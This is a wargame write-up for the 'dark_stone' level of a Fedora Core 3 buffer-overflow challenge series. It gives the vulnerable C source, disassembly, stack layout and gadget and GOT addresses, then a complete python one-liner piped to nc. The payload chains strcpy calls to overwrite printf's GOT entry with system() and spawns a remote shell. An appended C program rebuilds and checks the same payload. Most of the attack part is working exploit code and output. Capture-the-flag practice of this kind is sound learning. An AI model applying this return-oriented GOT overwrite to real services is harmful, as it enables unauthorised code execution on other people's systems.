2017. 12. 1. 20:08 · SystemHacking/Fedora Catle
evil_wizard / get down like that
The technique is the same as in the previous level (GOT overwriting); the only difference is that this one is remote, so the payload is delivered with cat and nc instead of being fed to a local binary.
[ dark_stone.c ]
/*
    The Lord of the BOF : The Fellowship of the BOF
    - dark_stone
    - Remote BOF on Fedora Core 3
    - hint : GOT overwriting again
    - port : TCP 8888
*/

#include <stdio.h>
#include <string.h>   /* strlen, memcpy, strcpy, memset */

// magic potion for you
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}

int main()
{
    char buffer[256];
    char saved_sfp[4];
    int length;
    char temp[1024];

    printf("dark_stone : how fresh meat you are!\n");
    printf("you : ");
    fflush(stdout);

    // give me a food
    fgets(temp, 1024, stdin);   // up to 1023 bytes land in temp; they are copied into buffer[256] below

    // for disturbance RET sleding
    length = strlen(temp);

    // save sfp
    memcpy(saved_sfp, buffer+264, 4);

    // overflow!!
    strcpy(buffer, temp);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    // disturbance RET sleding
    memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

    // buffer cleaning
    memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

    printf("%s\n", buffer);
}
[ Disassembly of main() ]
0x080484f8 <main+0>: push ebp
0x080484f9 <main+1>: mov ebp,esp
0x080484fb <main+3>: sub esp,0x518
0x08048501 <main+9>: and esp,0xfffffff0
....
0x0804851f <main+39>: call 0x8048408 <_init+104> printf()
0x08048524 <main+44>: add esp,0x10
0x08048527 <main+47>: sub esp,0xc
0x0804852a <main+50>: push 0x804873e
0x0804852f <main+55>: call 0x8048408 <_init+104> printf()
0x08048534 <main+60>: add esp,0x10
0x08048537 <main+63>: sub esp,0xc
0x0804853a <main+66>: push ds:0x8049868
0x08048540 <main+72>: call 0x80483c8 <_init+40> fflush()
0x08048545 <main+77>: add esp,0x10
0x08048548 <main+80>: sub esp,0x4
....
0x0804854b <main+83>: push ds:0x804986c
0x08048551 <main+89>: push 0x400
0x08048556 <main+94>: lea eax,[ebp-1304]
0x0804855c <main+100>: push eax
0x0804855d <main+101>: call 0x80483d8 <_init+56> fgets(temp,1024,stdin)
....
0x08048580 <main+136>: push 0x4
0x08048582 <main+138>: lea eax,[ebp-264]
0x08048588 <main+144>: add eax,0x108
0x0804858d <main+149>: push eax
0x0804858e <main+150>: lea eax,[ebp-268]
0x08048594 <main+156>: push eax
0x08048595 <main+157>: call 0x8048418 <_init+120> memcpy(saved_sfp,buffer+264,4)
0x0804859a <main+162>: add esp,0x10
0x0804859d <main+165>: sub esp,0x8
....
0x080485a0 <main+168>: lea eax,[ebp-1304]
0x080485a6 <main+174>: push eax
0x080485a7 <main+175>: lea eax,[ebp-264]
0x080485ad <main+181>: push eax
0x080485ae <main+182>: call 0x8048438 <_init+152> strcpy(buffer,temp)
.... strcpy's PLT
0x0804861a <main+290>: add esp,0x10
0x0804861d <main+293>: sub esp,0x8
0x08048620 <main+296>: lea eax,[ebp-264]
0x08048626 <main+302>: push eax
0x08048627 <main+303>: push 0x8048745
0x0804862c <main+308>: call 0x8048408 <_init+104> printf("%s\n",buffer)
printf's PLT
0x08048631 <main+313>: add esp,0x10
0x08048634 <main+316>: leave
0x08048635 <main+317>: ret
0x08048636 <main+318>: nop
0x08048637 <main+319>: nop
[ Stack ] (low addresses first; offsets from the disassembly above)
temp         1024 bytes   ebp-1304
length          4 bytes
dummy           8 bytes
saved_sfp       4 bytes   ebp-268
buffer        256 bytes   ebp-264
dummy           8 bytes
saved ebp       4 bytes   fixed at 0xfee87448: saved before the strcpy and restored afterwards, so a fake-EBP attack is out
saved eip       4 bytes   buffer+268, the only control-flow target we get

Everything from buffer+length up to 0xff000000 is zeroed after the copy, so the chain has to live entirely inside the bytes we send, and the separate memset of 0xf6ffe000-0xf7000000 wipes the stdin buffer that was usable in the previous level.
[ Addresses used ]
[evil_wizard@Fedora_1stFloor tmp]$ ./find
"/bin/sh" is at 0x833603
(argument for system(); once printf's GOT slot has been patched, calling printf's PLT entry with this argument is system("/bin/sh"))
strcpy() plt : 0x08048438
&pop_pop_ret : 0x080484f3  (the pop %eax; pop %eax; ret sequence inside pop_pop_ret(), used to discard strcpy's two arguments between calls)
&system() : 0x007507c0
printf() plt : 0x08048408
[ Locating printf's GOT slot ]
0x0804851f <main+39>: call 0x8048408 <_init+104> printf()
(gdb) x/3i 0x8048408 printf's PLT
0x8048408 <_init+104>: jmp ds:0x804984c
0x804840e <_init+110>: push 0x20
0x8048413 <_init+115>: jmp 0x80483b8 <_init+24>
(gdb) x/x 0x804984c
0x804984c <_GLOBAL_OFFSET_TABLE_+28>: 0x0804840e printf's GOT (lazy binding: before the first call the slot still points back into the stub)
The 4 bytes at 0x804984c are replaced with &system(). printf's stub is just `jmp *0x804984c`, so after the overwrite the final printf@plt call in the chain jumps straight into system().
[ Bytes to copy ]
&system() = 0x007507c0 is stored little-endian as c0 07 75 00, so each of those four bytes has to be found somewhere in the binary's readable image (the lines marked * below; the other lines show what follows them). Each strcpy copies up to and including the NUL terminator, so every call also writes 0x00 (and any non-NUL bytes before it) past its target byte. Writing the low byte first and moving upward lets each later call repair the bytes the previous one spilled into; the last spill lands in the slot after printf's, which is not used again once main() has returned.
* 0x80484d0 <frame_dummy+12>: 0xc0 0x74 0x19 0xb8
0x80484d4 <frame_dummy+16>: 0x00
* 0x8048364 <__libc_utmp_lock+125851260>: 0x07 0x01 0x00
* 0x80482b4 <__libc_utmp_lock+125851084>: 0x75 0x74 0x00 0x66
* 0x8048366 <__libc_utmp_lock+125851262>: 0x00
[ Payload ]
Layout: "A"*268 | 4 x ( strcpy@plt, pop_pop_ret, 0x804984c+i, &byte_i ) | printf@plt | "AAAA" (system's return address) | &"/bin/sh" | "\x00\x00\x00\x0a"
The only NUL before the trailing padding is the top byte of the "/bin/sh" address, so strcpy(buffer, temp) copies the whole chain intact; the trailing cat keeps the socket open so the shell can be used.
[evil_wizard@Fedora_1stFloor ~]$ (python -c 'print "A" * 268 + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4c\x98\x04\x08" + "\xd0\x84\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4d\x98\x04\x08" + "\x64\x83\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4e\x98\x04\x08" + "\xb4\x82\x04\x08" + "\x38\x84\x04\x08" + "\xf3\x84\x04\x08" + "\x4f\x98\x04\x08" + "\x66\x83\x04\x08" + "\x08\x84\x04\x08" + "AAAA" + "\x03\x36\x83\x00" + "\x00\x00\x00\x0a"';cat) | nc localhost 8888
dark_stone : how fresh meat you are!
you :
id
uid=505(dark_stone) gid=505(dark_stone) context=user_u:system_r:unconfined_t
my-pass
euid = 505
let there be light
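The following C program is an added example, not part of the original write-up or of the challenge. It replays the four strcpy() calls of the chain against a private copy of printf's GOT slot to show that the byte-by-byte writes (including the NUL spill of each call) really leave 0x007507c0 in the slot, and it builds the same byte layout the python one-liner sends so the offsets can be checked. All addresses are the ones listed above; the strings in `chain` are the byte contents gdb printed at the four source addresses. The initial slot value 0x0804840e and the assumption that the following GOT slot is never used again after main() returns are taken from the gdb output and the disassembly, not verified against a live target.

```c
/* Added example (not from the original write-up): replays the four strcpy()
 * calls of the chain above on a copy of printf's GOT slot and builds the byte
 * layout the python one-liner sends.  Addresses come from the write-up; the
 * strings in `chain` are the bytes gdb printed at the four source addresses. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PRINTF_GOT  0x0804984cu  /* slot behind printf's PLT stub: jmp *0x804984c */
#define PRINTF_PLT  0x08048408u
#define STRCPY_PLT  0x08048438u
#define POP_POP_RET 0x080484f3u  /* pop %eax; pop %eax; ret inside pop_pop_ret() */
#define SYSTEM_ADDR 0x007507c0u
#define BINSH_ADDR  0x00833603u
#define RET_OFFSET  268          /* buffer (256) + 8 bytes padding + saved ebp (4) */
#define PAYLOAD_LEN (RET_OFFSET + 4 * 16 + 16)  /* 348 */

struct src { uint32_t addr; const char *bytes; };

/* One source per byte of 0x007507c0, low byte first.  strcpy() copies through
 * the NUL, so each literal's implicit terminator models the 0x00 gdb showed. */
static const struct src chain[4] = {
    { 0x080484d0u, "\xc0\x74\x19\xb8" },  /* frame_dummy+12: c0 74 19 b8 00 */
    { 0x08048364u, "\x07\x01" },          /* 07 01 00 */
    { 0x080482b4u, "\x75\x74" },          /* 75 74 00 (the 0x66 after it is never copied) */
    { 0x08048366u, "" },                  /* a lone 00 */
};

/* Replay strcpy(PRINTF_GOT + i, chain[i].addr), i = 0..3, in a private window
 * that starts at the slot.  Returns the value left in the slot; *spill (if not
 * NULL) gets the number of bytes written past the 4-byte slot. */
uint32_t simulate_got_overwrite(size_t *spill)
{
    uint8_t window[16] = { 0x0e, 0x84, 0x04, 0x08 };   /* 0x0804840e: unresolved stub+6 */
    size_t farthest = 0;
    for (size_t i = 0; i < 4; i++) {
        size_t n = strlen(chain[i].bytes) + 1;         /* bytes strcpy() moves, NUL included */
        if (i + n > sizeof window)
            return 0;                                  /* refuse to model an unbounded write */
        memcpy(window + i, chain[i].bytes, n);         /* same effect as strcpy(dst, src) */
        if (i + n > farthest) farthest = i + n;
    }
    if (spill) *spill = farthest > 4 ? farthest - 4 : 0;
    return (uint32_t)window[0] | (uint32_t)window[1] << 8 |
           (uint32_t)window[2] << 16 | (uint32_t)window[3] << 24;
}

size_t chain_spill(void) { size_t s = 0; simulate_got_overwrite(&s); return s; }

static size_t put32(uint8_t *p, uint32_t v)
{
    for (int k = 0; k < 4; k++) p[k] = (uint8_t)(v >> (8 * k));   /* little-endian */
    return 4;
}

/* Build exactly the line the one-liner prints (before python's own "\n").
 * Returns bytes written, or 0 if cap is too small. */
size_t build_payload(uint8_t *out, size_t cap)
{
    if (cap < PAYLOAD_LEN) return 0;
    size_t n = RET_OFFSET;
    memset(out, 'A', n);                                 /* buffer, padding, saved ebp slot */
    for (uint32_t i = 0; i < 4; i++) {
        n += put32(out + n, STRCPY_PLT);                 /* ret -> strcpy(dst, src) */
        n += put32(out + n, POP_POP_RET);                /* strcpy returns here: pops dst, src */
        n += put32(out + n, PRINTF_GOT + i);             /* dst: byte i of printf's slot */
        n += put32(out + n, chain[i].addr);              /* src: byte i of &system in the binary */
    }
    n += put32(out + n, PRINTF_PLT);                     /* jmp *0x804984c -> system() */
    n += put32(out + n, 0x41414141u);                    /* system()'s return address */
    n += put32(out + n, BINSH_ADDR);                     /* its argument: "/bin/sh" in libc */
    out[n++] = 0; out[n++] = 0; out[n++] = 0; out[n++] = '\n';  /* pad, newline ends fgets() */
    return n;
}

/* strlen(temp) as dark_stone computes it: the first NUL is the top byte of
 * BINSH_ADDR, so strcpy(buffer, temp) copies the whole chain and the memset
 * that follows only zeroes bytes that were meant to be zero anyway. */
size_t payload_strlen(void)
{
    uint8_t buf[PAYLOAD_LEN];
    size_t n = build_payload(buf, sizeof buf), i = 0;
    while (i < n && buf[i]) i++;
    return i;
}

int main(void)
{
    uint32_t v = simulate_got_overwrite(NULL);
    printf("printf@GOT after the chain: 0x%08x (%s), %zu byte(s) spilled into the next slot\n",
           v, v == SYSTEM_ADDR ? "= system()" : "MISMATCH", chain_spill());
    printf("payload: %d bytes, strlen() seen by the target: %zu\n", PAYLOAD_LEN, payload_strlen());
    return v == SYSTEM_ADDR ? 0 : 1;
}
```

The order of the four copies matters: the first call writes five bytes (c0 74 19 b8 00) over the slot and one byte beyond it, and it is the second, third and fourth calls that turn 74 19 b8 back into 07 75 00. Reversing the order would leave stray bytes from the longer source strings in the high bytes of the slot.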